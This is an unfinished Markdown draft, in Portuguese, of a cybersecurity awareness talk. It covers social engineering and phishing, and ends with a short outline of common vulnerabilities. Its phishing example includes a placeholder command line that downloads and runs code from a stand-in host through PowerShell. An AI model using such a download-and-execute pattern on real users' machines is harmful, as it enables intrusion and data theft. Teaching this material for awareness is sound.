53 lines
2.7 KiB
Markdown
53 lines
2.7 KiB
Markdown
# Cybersegurança na prática: onde realmente os sistemas quebram
|
|
|
|
## Parte 0: Olá
|
|
Olá, meu nome é Álvaro, conhecido pelos apelidos **Russo Incendiário**
|
|

|
|
|
|
Gosto muito de ciência, tecnologia e pirotecnia.
|
|
|
|
## Parte 1: Quebrando o mito
|
|
> *beep boop* - We're in
|
|
|
|
Cybersegurança não é hoodie + tela verde.
|
|
- Hackers não “adivinham senha”.
|
|
- Não é força bruta cinematográfica.
|
|
- É entender como o sistema funciona melhor que quem construiu.
|
|
|
|
Se você tem um cadeado que precisa ser aberto, você não precisa da chave. Você precisa entender como o cadeado funciona
|
|
|
|
### Exercício mental
|
|
Eu quero invadir sua casa. Quem eu chamo?
|
|
1. Um ladrão profissional.
|
|

|
|
2. O chaveiro da esquina.
|
|

|
|
|
|
## Parte 2: O Maior Vetor de Ataque Não É Técnico
|
|
> “É mais fácil convencer alguém a abrir a porta do que arrombar a porta.”
|
|
|
|
Coloque na sua cabeça:
|
|
- Humanos são parte do sistema.
|
|
- Usuários são superfície de ataque.
|
|
- Confiança é explorável.
|
|
- Phishing funciona porque parece legítimo.
|
|
### Exercício mental
|
|
O que é mais fácil fazer para conseguir seus dados bancários?
|
|
1. Hackear a agência do Nubank
|
|

|
|
2. Descobrir qual jogador do Real Madrid você seria.
|
|

|
|
## Parte 3: Conheça seu alvo
|
|
Pergunte para qualquer estrategista como vencer uma batalha. Sua provavelmente resposta será
|
|
> "Conheça seu inimigo"
|
|
|
|
### Exemplo de caso real
|
|
Um CEO de uma empresa de Uberlândia está sentado no seu escritório fazendo seu trabalho. De vez em quando conversa com os funcionários. Reclama que o ar condicionado está muito fraco. Enquanto isso ele checa seus emails. Dentro deles há um email que passaria despercebido. "Nota fiscal da Empresa X (inventar)". Inocentemente ele abre, baixa o arquivo zip, e dentro tem um arquivo. `nf-210230120310240102.pdf`. O que ele não percebe é que não é um arquivo PDF, e sim um link para um endereço peculiar. Esse endereço não é da internet, e sim uma linha de comando.
|
|
`powershell curl exemplo.com | execute` (melhorar). Sem perceber, ele abre. Uma tela do prompt de comando pisca em sua tela por um segundo. Pronto. Agora hackers tem acesso à sua máquina. Podem passar dias despercebidos enquanto colhem inteligência, dados de clientes, e qualquer outra informação que possa ser útil no futuro para extorquir ou aplicar golpes à empresa.
|
|
## Parte 4: Vulnerabilidades do Mundo Real
|
|
|
|
### Caso 1: Sistema de Controle de Acesso vazando senhas de rede.
|
|
|
|
- SQL Injection em simulador
|
|
- PostgreSQL exposto sem autenticação
|
|
- Redis aberto (pode mencionar como exemplo clássico) |